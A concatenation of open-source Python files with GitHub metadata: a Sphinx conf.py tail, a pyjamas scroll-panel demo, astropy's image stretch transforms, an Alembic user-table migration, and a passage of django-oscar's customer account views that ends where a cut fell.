# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'arcade_tutorial.tex', 'arcade\\_tutorial Documentation',
'Paul Everitt', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'arcade_tutorial', 'arcade_tutorial Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'arcade_tutorial', 'arcade_tutorial Documentation',
author, 'arcade_tutorial', 'One line description of project.',
'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
|
{
"content_hash": "978774d31cd4dae6e8a11afba43ab9e9",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 78,
"avg_line_length": 32.38345864661654,
"alnum_prop": 0.6665892732760622,
"repo_name": "pauleveritt/arcade_tutorial",
"id": "6212adb741646b5093cf7057a8beeeb18393cf39",
"size": "5067",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
"""
The ``ui.ScrollPanel`` class implements a panel that scrolls its contents.
If you want the scroll bars to be always visible, call
``setAlwaysShowScrollBars(True)``. You can also change the current scrolling
position programmatically by calling ``setScrollPosition(vPos)`` and
``setScrollHorizontalPosition(hPos)`` to change the horizontal and vertical
scrolling position, respectively.
"""
from pyjamas.ui.SimplePanel import SimplePanel
from pyjamas.ui.ScrollPanel import ScrollPanel
from pyjamas.ui.HTML import HTML
class ScrollPanelDemo(SimplePanel):
def __init__(self):
SimplePanel.__init__(self)
panel = ScrollPanel()
contents = HTML("<b>Tao Te Ching, Chapter One</b><p>" +
"The Way that can be told of is not an unvarying " +
"way;<p>The names that can be named are not " +
"unvarying names.<p>It was from the Nameless that " +
"Heaven and Earth sprang;<p>The named is but the " +
"mother that rears the ten thousand creatures, " +
"each after its kind.")
panel.add(contents)
panel.setSize("300px", "100px")
self.add(panel)
|
{
"content_hash": "7dbe4596045db8e009cdd4a32fa9b596",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 77,
"avg_line_length": 39.87096774193548,
"alnum_prop": 0.633495145631068,
"repo_name": "certik/pyjamas",
"id": "59cbda85b0e68f2f2641823d2b584e6d661b3c0c",
"size": "1236",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "examples/showcase/src/demos_panels/scrollPanel.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "401884"
},
{
"name": "PHP",
"bytes": "121841"
},
{
"name": "Python",
"bytes": "4074658"
},
{
"name": "Shell",
"bytes": "14552"
}
],
"symlink_target": ""
}
|
"""
Classes that deal with stretching, i.e. mapping a range of [0:1] values onto
another set of [0:1] values with a transformation
"""
import numpy as np
from .transform import BaseTransform
from .transform import CompositeTransform
__all__ = ["BaseStretch", "LinearStretch", "SqrtStretch", "PowerStretch",
"PowerDistStretch", "SquaredStretch", "LogStretch", "AsinhStretch",
"SinhStretch", "HistEqStretch", "ContrastBiasStretch",
"CompositeStretch"]
def _logn(n, x, out=None):
"""Calculate the log base n of x."""
# We define this because numpy.lib.scimath.logn doesn't support out=
if out is None:
return np.log(x) / np.log(n)
else:
np.log(x, out=out)
np.true_divide(out, np.log(n), out=out)
return out
def _prepare(values, clip=True, out=None):
"""
Prepare the data by optionally clipping and copying, and return the
array that should be subsequently used for in-place calculations.
"""
if clip:
return np.clip(values, 0., 1., out=out)
else:
if out is None:
return np.array(values, copy=True)
else:
out[:] = np.asarray(values)
return out
class BaseStretch(BaseTransform):
"""
Base class for the stretch classes, which, when called with an array
of values in the range [0:1], return an transformed array of values,
also in the range [0:1].
"""
@property
def _supports_invalid_kw(self):
return False
def __add__(self, other):
return CompositeStretch(other, self)
def __call__(self, values, clip=True, out=None):
"""
Transform values using this stretch.
Parameters
----------
values : array_like
The input values, which should already be normalized to the
[0:1] range.
clip : bool, optional
If `True` (default), values outside the [0:1] range are
clipped to the [0:1] range.
out : `~numpy.ndarray`, optional
If specified, the output values will be placed in this array
(typically used for in-place calculations).
Returns
-------
result : `~numpy.ndarray`
The transformed values.
"""
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
class LinearStretch(BaseStretch):
"""
A linear stretch with a slope and offset.
The stretch is given by:
.. math::
y = slope x + intercept
Parameters
----------
slope : float, optional
The ``slope`` parameter used in the above formula. Default is 1.
intercept : float, optional
The ``intercept`` parameter used in the above formula. Default is 0.
"""
def __init__(self, slope=1, intercept=0):
super().__init__()
self.slope = slope
self.intercept = intercept
def __call__(self, values, clip=True, out=None):
values = _prepare(values, clip=clip, out=out)
if self.slope != 1:
np.multiply(values, self.slope, out=values)
if self.intercept != 0:
np.add(values, self.intercept, out=values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return LinearStretch(1. / self.slope, - self.intercept / self.slope)
class SqrtStretch(BaseStretch):
r"""
A square root stretch.
The stretch is given by:
.. math::
y = \sqrt{x}
"""
@property
def _supports_invalid_kw(self):
return True
def __call__(self, values, clip=True, out=None, invalid=None):
"""
Transform values using this stretch.
Parameters
----------
values : array_like
The input values, which should already be normalized to the
[0:1] range.
clip : bool, optional
If `True` (default), values outside the [0:1] range are
clipped to the [0:1] range.
out : `~numpy.ndarray`, optional
If specified, the output values will be placed in this array
(typically used for in-place calculations).
invalid : `None` or float, optional
Value to assign NaN values generated by this class. NaNs in
the input ``values`` array are not changed. This option is
generally used with matplotlib normalization classes, where
the ``invalid`` value should map to the matplotlib colormap
"under" value (i.e., any finite value < 0). If `None`, then
NaN values are not replaced. This keyword has no effect if
``clip=True``.
Returns
-------
result : `~numpy.ndarray`
The transformed values.
"""
values = _prepare(values, clip=clip, out=out)
replace_invalid = not clip and invalid is not None
with np.errstate(invalid='ignore'):
if replace_invalid:
idx = (values < 0)
np.sqrt(values, out=values)
if replace_invalid:
# Assign new NaN (i.e., NaN not in the original input
# values, but generated by this class) to the invalid value.
values[idx] = invalid
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return PowerStretch(2)
class PowerStretch(BaseStretch):
r"""
A power stretch.
The stretch is given by:
.. math::
y = x^a
Parameters
----------
a : float
The power index (see the above formula). ``a`` must be greater
than 0.
"""
@property
def _supports_invalid_kw(self):
return True
def __init__(self, a):
super().__init__()
if a <= 0:
raise ValueError("a must be > 0")
self.power = a
def __call__(self, values, clip=True, out=None, invalid=None):
"""
Transform values using this stretch.
Parameters
----------
values : array_like
The input values, which should already be normalized to the
[0:1] range.
clip : bool, optional
If `True` (default), values outside the [0:1] range are
clipped to the [0:1] range.
out : `~numpy.ndarray`, optional
If specified, the output values will be placed in this array
(typically used for in-place calculations).
invalid : `None` or float, optional
Value to assign NaN values generated by this class. NaNs in
the input ``values`` array are not changed. This option is
generally used with matplotlib normalization classes, where
the ``invalid`` value should map to the matplotlib colormap
"under" value (i.e., any finite value < 0). If `None`, then
NaN values are not replaced. This keyword has no effect if
``clip=True``.
Returns
-------
result : `~numpy.ndarray`
The transformed values.
"""
values = _prepare(values, clip=clip, out=out)
replace_invalid = (not clip and invalid is not None
and ((-1 < self.power < 0)
or (0 < self.power < 1)))
with np.errstate(invalid='ignore'):
if replace_invalid:
idx = (values < 0)
np.power(values, self.power, out=values)
if replace_invalid:
# Assign new NaN (i.e., NaN not in the original input
# values, but generated by this class) to the invalid value.
values[idx] = invalid
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return PowerStretch(1. / self.power)
class PowerDistStretch(BaseStretch):
r"""
An alternative power stretch.
The stretch is given by:
.. math::
y = \frac{a^x - 1}{a - 1}
Parameters
----------
a : float, optional
The ``a`` parameter used in the above formula. ``a`` must be
greater than or equal to 0, but cannot be set to 1. Default is
1000.
"""
def __init__(self, a=1000.0):
if a < 0 or a == 1: # singularity
raise ValueError("a must be >= 0, but cannot be set to 1")
super().__init__()
self.exp = a
def __call__(self, values, clip=True, out=None):
values = _prepare(values, clip=clip, out=out)
np.power(self.exp, values, out=values)
np.subtract(values, 1, out=values)
np.true_divide(values, self.exp - 1.0, out=values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return InvertedPowerDistStretch(a=self.exp)
class InvertedPowerDistStretch(BaseStretch):
r"""
Inverse transformation for
`~astropy.image.scaling.PowerDistStretch`.
The stretch is given by:
.. math::
y = \frac{\log(y (a-1) + 1)}{\log a}
Parameters
----------
a : float, optional
The ``a`` parameter used in the above formula. ``a`` must be
greater than or equal to 0, but cannot be set to 1. Default is
1000.
"""
def __init__(self, a=1000.0):
if a < 0 or a == 1: # singularity
raise ValueError("a must be >= 0, but cannot be set to 1")
super().__init__()
self.exp = a
def __call__(self, values, clip=True, out=None):
values = _prepare(values, clip=clip, out=out)
np.multiply(values, self.exp - 1.0, out=values)
np.add(values, 1, out=values)
_logn(self.exp, values, out=values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return PowerDistStretch(a=self.exp)
class SquaredStretch(PowerStretch):
r"""
A convenience class for a power stretch of 2.
The stretch is given by:
.. math::
y = x^2
"""
def __init__(self):
super().__init__(2)
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return SqrtStretch()
class LogStretch(BaseStretch):
r"""
A log stretch.
The stretch is given by:
.. math::
y = \frac{\log{(a x + 1)}}{\log{(a + 1)}}
Parameters
----------
a : float
The ``a`` parameter used in the above formula. ``a`` must be
greater than 0. Default is 1000.
"""
@property
def _supports_invalid_kw(self):
return True
def __init__(self, a=1000.0):
super().__init__()
if a <= 0: # singularity
raise ValueError("a must be > 0")
self.exp = a
def __call__(self, values, clip=True, out=None, invalid=None):
"""
Transform values using this stretch.
Parameters
----------
values : array_like
The input values, which should already be normalized to the
[0:1] range.
clip : bool, optional
If `True` (default), values outside the [0:1] range are
clipped to the [0:1] range.
out : `~numpy.ndarray`, optional
If specified, the output values will be placed in this array
(typically used for in-place calculations).
invalid : `None` or float, optional
Value to assign NaN values generated by this class. NaNs in
the input ``values`` array are not changed. This option is
generally used with matplotlib normalization classes, where
the ``invalid`` value should map to the matplotlib colormap
"under" value (i.e., any finite value < 0). If `None`, then
NaN values are not replaced. This keyword has no effect if
``clip=True``.
Returns
-------
result : `~numpy.ndarray`
The transformed values.
"""
values = _prepare(values, clip=clip, out=out)
replace_invalid = not clip and invalid is not None
with np.errstate(invalid='ignore'):
if replace_invalid:
idx = (values < 0)
np.multiply(values, self.exp, out=values)
np.add(values, 1., out=values)
np.log(values, out=values)
np.true_divide(values, np.log(self.exp + 1.), out=values)
if replace_invalid:
# Assign new NaN (i.e., NaN not in the original input
# values, but generated by this class) to the invalid value.
values[idx] = invalid
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return InvertedLogStretch(self.exp)
class InvertedLogStretch(BaseStretch):
r"""
Inverse transformation for `~astropy.image.scaling.LogStretch`.
The stretch is given by:
.. math::
y = \frac{e^{y \log{a + 1}} - 1}{a} \\
y = \frac{e^{y} (a + 1) - 1}{a}
Parameters
----------
a : float, optional
The ``a`` parameter used in the above formula. ``a`` must be
greater than 0. Default is 1000.
"""
def __init__(self, a):
super().__init__()
if a <= 0: # singularity
raise ValueError("a must be > 0")
self.exp = a
def __call__(self, values, clip=True, out=None):
values = _prepare(values, clip=clip, out=out)
np.multiply(values, np.log(self.exp + 1.), out=values)
np.exp(values, out=values)
np.subtract(values, 1., out=values)
np.true_divide(values, self.exp, out=values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return LogStretch(self.exp)
class AsinhStretch(BaseStretch):
r"""
An asinh stretch.
The stretch is given by:
.. math::
y = \frac{{\rm asinh}(x / a)}{{\rm asinh}(1 / a)}.
Parameters
----------
a : float, optional
The ``a`` parameter used in the above formula. The value of
this parameter is where the asinh curve transitions from linear
to logarithmic behavior, expressed as a fraction of the
normalized image. ``a`` must be greater than 0 and less than or
equal to 1 (0 < a <= 1). Default is 0.1.
"""
def __init__(self, a=0.1):
super().__init__()
if a <= 0 or a > 1:
raise ValueError("a must be > 0 and <= 1")
self.a = a
def __call__(self, values, clip=True, out=None):
values = _prepare(values, clip=clip, out=out)
np.true_divide(values, self.a, out=values)
np.arcsinh(values, out=values)
np.true_divide(values, np.arcsinh(1. / self.a), out=values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return SinhStretch(a=1. / np.arcsinh(1. / self.a))
class SinhStretch(BaseStretch):
r"""
A sinh stretch.
The stretch is given by:
.. math::
y = \frac{{\rm sinh}(x / a)}{{\rm sinh}(1 / a)}
Parameters
----------
a : float, optional
The ``a`` parameter used in the above formula. ``a`` must be
greater than 0 and less than or equal to 1 (0 < a <= 1).
Default is 1/3.
"""
def __init__(self, a=1./3.):
super().__init__()
if a <= 0 or a > 1:
raise ValueError("a must be > 0 and <= 1")
self.a = a
def __call__(self, values, clip=True, out=None):
values = _prepare(values, clip=clip, out=out)
np.true_divide(values, self.a, out=values)
np.sinh(values, out=values)
np.true_divide(values, np.sinh(1. / self.a), out=values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return AsinhStretch(a=1. / np.sinh(1. / self.a))
class HistEqStretch(BaseStretch):
"""
A histogram equalization stretch.
Parameters
----------
data : array_like
The data defining the equalization.
values : array_like, optional
The input image values, which should already be normalized to
the [0:1] range.
"""
def __init__(self, data, values=None):
# Assume data is not necessarily normalized at this point
self.data = np.sort(data.ravel())
self.data = self.data[np.isfinite(self.data)]
vmin = self.data.min()
vmax = self.data.max()
self.data = (self.data - vmin) / (vmax - vmin)
# Compute relative position of each pixel
if values is None:
self.values = np.linspace(0., 1., len(self.data))
else:
self.values = values
def __call__(self, values, clip=True, out=None):
values = _prepare(values, clip=clip, out=out)
values[:] = np.interp(values, self.data, self.values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return InvertedHistEqStretch(self.data, values=self.values)
class InvertedHistEqStretch(BaseStretch):
"""
Inverse transformation for `~astropy.image.scaling.HistEqStretch`.
Parameters
----------
data : array_like
The data defining the equalization.
values : array_like, optional
The input image values, which should already be normalized to
the [0:1] range.
"""
def __init__(self, data, values=None):
self.data = data[np.isfinite(data)]
if values is None:
self.values = np.linspace(0., 1., len(self.data))
else:
self.values = values
def __call__(self, values, clip=True, out=None):
values = _prepare(values, clip=clip, out=out)
values[:] = np.interp(values, self.values, self.data)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return HistEqStretch(self.data, values=self.values)
class ContrastBiasStretch(BaseStretch):
r"""
A stretch that takes into account contrast and bias.
The stretch is given by:
.. math::
y = (x - {\rm bias}) * {\rm contrast} + 0.5
and the output values are clipped to the [0:1] range.
Parameters
----------
contrast : float
The contrast parameter (see the above formula).
bias : float
The bias parameter (see the above formula).
"""
def __init__(self, contrast, bias):
super().__init__()
self.contrast = contrast
self.bias = bias
def __call__(self, values, clip=True, out=None):
# As a special case here, we only clip *after* the
# transformation since it does not map [0:1] to [0:1]
values = _prepare(values, clip=False, out=out)
np.subtract(values, self.bias, out=values)
np.multiply(values, self.contrast, out=values)
np.add(values, 0.5, out=values)
if clip:
np.clip(values, 0, 1, out=values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return InvertedContrastBiasStretch(self.contrast, self.bias)
class InvertedContrastBiasStretch(BaseStretch):
"""
Inverse transformation for ContrastBiasStretch.
Parameters
----------
contrast : float
The contrast parameter (see
`~astropy.visualization.ConstrastBiasStretch).
bias : float
The bias parameter (see
`~astropy.visualization.ConstrastBiasStretch).
"""
def __init__(self, contrast, bias):
super().__init__()
self.contrast = contrast
self.bias = bias
def __call__(self, values, clip=True, out=None):
# As a special case here, we only clip *after* the
# transformation since it does not map [0:1] to [0:1]
values = _prepare(values, clip=False, out=out)
np.subtract(values, 0.5, out=values)
np.true_divide(values, self.contrast, out=values)
np.add(values, self.bias, out=values)
if clip:
np.clip(values, 0, 1, out=values)
return values
@property
def inverse(self):
"""A stretch object that performs the inverse operation."""
return ContrastBiasStretch(self.contrast, self.bias)
class CompositeStretch(CompositeTransform, BaseStretch):
"""
A combination of two stretches.
Parameters
----------
stretch_1 : :class:`astropy.visualization.BaseStretch`
The first stretch to apply.
stretch_2 : :class:`astropy.visualization.BaseStretch`
The second stretch to apply.
"""
def __call__(self, values, clip=True, out=None):
return self.transform_2(
self.transform_1(values, clip=clip, out=out), clip=clip, out=out)
|
{
"content_hash": "44db8c1070dd5316b3a6a42f4b9a1289",
"timestamp": "",
"source": "github",
"line_count": 713,
"max_line_length": 78,
"avg_line_length": 29.65638148667602,
"alnum_prop": 0.5745093402695672,
"repo_name": "dhomeier/astropy",
"id": "419868c759262e623017be19037dc8efaf94685a",
"size": "21210",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "astropy/visualization/stretch.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "10891881"
},
{
"name": "C++",
"bytes": "55147"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Lex",
"bytes": "181654"
},
{
"name": "M4",
"bytes": "18016"
},
{
"name": "Makefile",
"bytes": "51059"
},
{
"name": "Python",
"bytes": "10582251"
},
{
"name": "Shell",
"bytes": "17024"
},
{
"name": "TeX",
"bytes": "853"
}
],
"symlink_target": ""
}
|
"""empty message
Revision ID: 4249ec1222e4
Revises: 481d4a3fef63
Create Date: 2014-08-14 22:02:40.703605
"""
# revision identifiers, used by Alembic.
revision = '4249ec1222e4'
down_revision = '481d4a3fef63'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('user_info',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('email', sa.String(length=255), nullable=True),
sa.Column('password', sa.String(length=255), nullable=True),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('user_info')
### end Alembic commands ###
|
{
"content_hash": "72779a8a2fe80c2ee5cf34bf071d58fc",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 64,
"avg_line_length": 27.03030303030303,
"alnum_prop": 0.6782511210762332,
"repo_name": "kho0810/flaskr",
"id": "32f6d108e214afbc0e24845ceb2162279ec4dd1e",
"size": "892",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/4249ec1222e4_.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "6327"
},
{
"name": "JavaScript",
"bytes": "11606"
},
{
"name": "PHP",
"bytes": "76"
},
{
"name": "Python",
"bytes": "7636567"
}
],
"symlink_target": ""
}
|
from django import http
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import login as auth_login
from django.contrib.auth import logout as auth_logout
from django.contrib.auth import update_session_auth_hash
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse, reverse_lazy
from django.shortcuts import get_object_or_404, redirect
from django.utils.translation import ugettext_lazy as _
from django.views import generic
from oscar.apps.customer.utils import get_password_reset_url
from oscar.core.compat import get_user_model
from oscar.core.loading import (
get_class, get_classes, get_model, get_profile_class)
from oscar.core.utils import safe_referrer
from oscar.views.generic import PostActionMixin
from . import signals
PageTitleMixin, RegisterUserMixin = get_classes(
'customer.mixins', ['PageTitleMixin', 'RegisterUserMixin'])
Dispatcher = get_class('customer.utils', 'Dispatcher')
EmailAuthenticationForm, EmailUserCreationForm, OrderSearchForm = get_classes(
'customer.forms', ['EmailAuthenticationForm', 'EmailUserCreationForm',
'OrderSearchForm'])
PasswordChangeForm = get_class('customer.forms', 'PasswordChangeForm')
ProfileForm, ConfirmPasswordForm = get_classes(
'customer.forms', ['ProfileForm', 'ConfirmPasswordForm'])
UserAddressForm = get_class('address.forms', 'UserAddressForm')
Order = get_model('order', 'Order')
Line = get_model('basket', 'Line')
Basket = get_model('basket', 'Basket')
UserAddress = get_model('address', 'UserAddress')
Email = get_model('customer', 'Email')
ProductAlert = get_model('customer', 'ProductAlert')
CommunicationEventType = get_model('customer', 'CommunicationEventType')
User = get_user_model()
# =======
# Account
# =======
class AccountSummaryView(generic.RedirectView):
"""
View that exists for legacy reasons and customisability. It commonly gets
called when the user clicks on "Account" in the navbar.
Oscar defaults to just redirecting to the profile summary page (and
that redirect can be configured via OSCAR_ACCOUNT_REDIRECT_URL), but
it's also likely you want to display an 'account overview' page or
such like. The presence of this view allows just that, without
having to change a lot of templates.
"""
pattern_name = settings.OSCAR_ACCOUNTS_REDIRECT_URL
permanent = False
class AccountRegistrationView(RegisterUserMixin, generic.FormView):
form_class = EmailUserCreationForm
template_name = 'customer/registration.html'
redirect_field_name = 'next'
def get(self, request, *args, **kwargs):
if request.user.is_authenticated():
return redirect(settings.LOGIN_REDIRECT_URL)
return super(AccountRegistrationView, self).get(
request, *args, **kwargs)
def get_logged_in_redirect(self):
return reverse('customer:summary')
def get_form_kwargs(self):
kwargs = super(AccountRegistrationView, self).get_form_kwargs()
kwargs['initial'] = {
'email': self.request.GET.get('email', ''),
'redirect_url': self.request.GET.get(self.redirect_field_name, '')
}
kwargs['host'] = self.request.get_host()
return kwargs
def get_context_data(self, *args, **kwargs):
ctx = super(AccountRegistrationView, self).get_context_data(
*args, **kwargs)
ctx['cancel_url'] = safe_referrer(self.request, '')
return ctx
def form_valid(self, form):
self.register_user(form)
return redirect(form.cleaned_data['redirect_url'])
class AccountAuthView(RegisterUserMixin, generic.TemplateView):
"""
This is actually a slightly odd double form view that allows a customer to
either login or register.
"""
template_name = 'customer/login_registration.html'
login_prefix, registration_prefix = 'login', 'registration'
login_form_class = EmailAuthenticationForm
registration_form_class = EmailUserCreationForm
redirect_field_name = 'next'
def get(self, request, *args, **kwargs):
if request.user.is_authenticated():
return redirect(settings.LOGIN_REDIRECT_URL)
return super(AccountAuthView, self).get(
request, *args, **kwargs)
def get_context_data(self, *args, **kwargs):
ctx = super(AccountAuthView, self).get_context_data(*args, **kwargs)
if 'login_form' not in kwargs:
ctx['login_form'] = self.get_login_form()
if 'registration_form' not in kwargs:
ctx['registration_form'] = self.get_registration_form()
return ctx
def post(self, request, *args, **kwargs):
# Use the name of the submit button to determine which form to validate
if u'login_submit' in request.POST:
return self.validate_login_form()
elif u'registration_submit' in request.POST:
return self.validate_registration_form()
return http.HttpResponseBadRequest()
# LOGIN
def get_login_form(self, bind_data=False):
return self.login_form_class(
**self.get_login_form_kwargs(bind_data))
def get_login_form_kwargs(self, bind_data=False):
kwargs = {}
kwargs['host'] = self.request.get_host()
kwargs['prefix'] = self.login_prefix
kwargs['initial'] = {
'redirect_url': self.request.GET.get(self.redirect_field_name, ''),
}
if bind_data and self.request.method in ('POST', 'PUT'):
kwargs.update({
'data': self.request.POST,
'files': self.request.FILES,
})
return kwargs
def validate_login_form(self):
form = self.get_login_form(bind_data=True)
if form.is_valid():
user = form.get_user()
# Grab a reference to the session ID before logging in
old_session_key = self.request.session.session_key
auth_login(self.request, form.get_user())
# Raise signal robustly (we don't want exceptions to crash the
# request handling). We use a custom signal as we want to track the
# session key before calling login (which cycles the session ID).
signals.user_logged_in.send_robust(
sender=self, request=self.request, user=user,
old_session_key=old_session_key)
msg = self.get_login_success_message(form)
if msg:
messages.success(self.request, msg)
return redirect(self.get_login_success_url(form))
ctx = self.get_context_data(login_form=form)
return self.render_to_response(ctx)
def get_login_success_message(self, form):
return _("Welcome back")
def get_login_success_url(self, form):
redirect_url = form.cleaned_data['redirect_url']
if redirect_url:
return redirect_url
# Redirect staff members to dashboard as that's the most likely place
# they'll want to visit if they're logging in.
if self.request.user.is_staff:
return reverse('dashboard:index')
return settings.LOGIN_REDIRECT_URL
# REGISTRATION
def get_registration_form(self, bind_data=False):
return self.registration_form_class(
**self.get_registration_form_kwargs(bind_data))
def get_registration_form_kwargs(self, bind_data=False):
kwargs = {}
kwargs['host'] = self.request.get_host()
kwargs['prefix'] = self.registration_prefix
kwargs['initial'] = {
'redirect_url': self.request.GET.get(self.redirect_field_name, ''),
}
if bind_data and self.request.method in ('POST', 'PUT'):
kwargs.update({
'data': self.request.POST,
'files': self.request.FILES,
})
return kwargs
def validate_registration_form(self):
form = self.get_registration_form(bind_data=True)
if form.is_valid():
self.register_user(form)
msg = self.get_registration_success_message(form)
messages.success(self.request, msg)
return redirect(self.get_registration_success_url(form))
ctx = self.get_context_data(registration_form=form)
return self.render_to_response(ctx)
def get_registration_success_message(self, form):
return _("Thanks for registering!")
def get_registration_success_url(self, form):
redirect_url = form.cleaned_data['redirect_url']
if redirect_url:
return redirect_url
return settings.LOGIN_REDIRECT_URL
class LogoutView(generic.RedirectView):
url = settings.OSCAR_HOMEPAGE
permanent = False
def get(self, request, *args, **kwargs):
auth_logout(request)
response = super(LogoutView, self).get(request, *args, **kwargs)
for cookie in settings.OSCAR_COOKIES_DELETE_ON_LOGOUT:
response.delete_cookie(cookie)
return response
# =============
# Profile
# =============
class ProfileView(PageTitleMixin, generic.TemplateView):
template_name = 'customer/profile/profile.html'
page_title = _('Profile')
active_tab = 'profile'
def get_context_data(self, **kwargs):
ctx = super(ProfileView, self).get_context_data(**kwargs)
ctx['profile_fields'] = self.get_profile_fields(self.request.user)
return ctx
def get_profile_fields(self, user):
field_data = []
# Check for custom user model
for field_name in User._meta.additional_fields:
field_data.append(
self.get_model_field_data(user, field_name))
# Check for profile class
profile_class = get_profile_class()
if profile_class:
try:
profile = profile_class.objects.get(user=user)
except ObjectDoesNotExist:
profile = profile_class(user=user)
field_names = [f.name for f in profile._meta.local_fields]
for field_name in field_names:
if field_name in ('user', 'id'):
continue
field_data.append(
self.get_model_field_data(profile, field_name))
return field_data
def get_model_field_data(self, model_class, field_name):
"""
Extract the verbose name and value for a model's field value
"""
field = model_class._meta.get_field(field_name)
if field.choices:
value = getattr(model_class, 'get_%s_display' % field_name)()
else:
value = getattr(model_class, field_name)
return {
'name': getattr(field, 'verbose_name'),
'value': value,
}
class ProfileUpdateView(PageTitleMixin, generic.FormView):
form_class = ProfileForm
template_name = 'customer/profile/profile_form.html'
communication_type_code = 'EMAIL_CHANGED'
page_title = _('Edit Profile')
active_tab = 'profile'
success_url = reverse_lazy('customer:profile-view')
def get_form_kwargs(self):
kwargs = super(ProfileUpdateView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def form_valid(self, form):
# Grab current user instance before we save form. We may need this to
# send a warning email if the email address is changed.
try:
old_user = User.objects.get(id=self.request.user.id)
except User.DoesNotExist:
old_user = None
form.save()
# We have to look up the email address from the form's
# cleaned data because the object created by form.save() can
# either be a user or profile instance depending whether a profile
# class has been specified by the AUTH_PROFILE_MODULE setting.
new_email = form.cleaned_data.get('email')
if new_email and old_user and new_email != old_user.email:
# Email address has changed - send a confirmation email to the old
# address including a password reset link in case this is a
# suspicious change.
ctx = {
'user': self.request.user,
'site': get_current_site(self.request),
'reset_url': get_password_reset_url(old_user),
'new_email': new_email,
}
msgs = CommunicationEventType.objects.get_and_render(
code=self.communication_type_code, context=ctx)
Dispatcher().dispatch_user_messages(old_user, msgs)
messages.success(self.request, _("Profile updated"))
return redirect(self.get_success_url())
class ProfileDeleteView(PageTitleMixin, generic.FormView):
form_class = ConfirmPasswordForm
template_name = 'customer/profile/profile_delete.html'
page_title = _('Delete profile')
active_tab = 'profile'
success_url = settings.OSCAR_HOMEPAGE
def get_form_kwargs(self):
kwargs = super(ProfileDeleteView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def form_valid(self, form):
self.request.user.delete()
messages.success(
self.request,
_("Your profile has now been deleted. Thanks for using the site."))
return redirect(self.get_success_url())
class ChangePasswordView(PageTitleMixin, generic.FormView):
form_class = PasswordChangeForm
template_name = 'customer/profile/change_password_form.html'
communication_type_code = 'PASSWORD_CHANGED'
page_title = _('Change Password')
active_tab = 'profile'
success_url = reverse_lazy('customer:profile-view')
def get_form_kwargs(self):
kwargs = super(ChangePasswordView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def form_valid(self, form):
form.save()
update_session_auth_hash(self.request, self.request.user)
messages.success(self.request, _("Password updated"))
ctx = {
'user': self.request.user,
'site': get_current_site(self.request),
'reset_url': get_password_reset_url(self.request.user),
}
msgs = CommunicationEventType.objects.get_and_render(
code=self.communication_type_code, context=ctx)
Dispatcher().dispatch_user_messages(self.request.user, msgs)
return redirect(self.get_success_url())
# =============
# Email history
# =============
class EmailHistoryView(PageTitleMixin, generic.ListView):
context_object_name = "emails"
template_name = 'customer/email/email_list.html'
paginate_by = settings.OSCAR_EMAILS_PER_PAGE
page_title = _('Email History')
active_tab = 'emails'
def get_queryset(self):
return Email._default_manager.filter(user=self.request.user)
class EmailDetailView(PageTitleMixin, generic.DetailView):
"""Customer email"""
template_name = "customer/email/email_detail.html"
context_object_name = 'email'
active_tab = 'emails'
def get_object(self, queryset=None):
return get_object_or_404(Email, user=self.request.user,
id=self.kwargs['email_id'])
def get_page_title(self):
"""Append email subject to page title"""
return u'%s: %s' % (_('Email'), self.object.subject)
# =============
# Order history
# =============
class OrderHistoryView(PageTitleMixin, generic.ListView):
"""
Customer order history
"""
context_object_name = "orders"
template_name = 'customer/order/order_list.html'
